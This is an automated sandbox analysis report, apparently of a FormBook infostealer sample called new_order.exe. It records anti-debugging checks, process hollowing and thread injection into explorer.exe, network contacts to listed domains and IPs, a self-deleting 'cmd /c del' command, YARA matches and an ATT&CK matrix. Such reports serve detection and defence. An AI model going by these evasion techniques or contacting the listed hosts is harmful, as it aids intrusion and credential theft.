          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0498A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04924120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04927D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04943D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04983540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04948EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04923A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04938E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04918A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04994257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0494927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04918794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04911B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04911B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04934BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04934BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04934BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04904F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04904F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04933B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04933B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0490DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0040ACE0 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.royalfountainlogistics.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exeDomain query: www.bitherders.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\new_order.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 1160000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\new_order.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\new_order.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\new_order.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\new_order.exeMemory written: C:\Users\user\Desktop\new_order.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\new_order.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\new_order.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\new_order.exeProcess created: C:\Users\user\Desktop\new_order.exe "C:\Users\user\Desktop\new_order.exe"
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new_order.exe"
          Source: explorer.exe, 00000005.00000000.728348179.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.709064422.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.695157281.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.710184984.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.728572990.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.695317494.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.710184984.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.728572990.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.717194149.0000000005E50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.695317494.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.710184984.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.728572990.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.695317494.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000005.00000000.710184984.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.728572990.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.695317494.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.701747574.000000000A716000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.720684965.000000000A716000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.736203145.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Native API          		Path Interception612
          Process Injection          		1
          Rootkit          		1
          Credential API Hooking          		121
          Security Software Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
          Virtualization/Sandbox Evasion          		LSASS Memory2
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
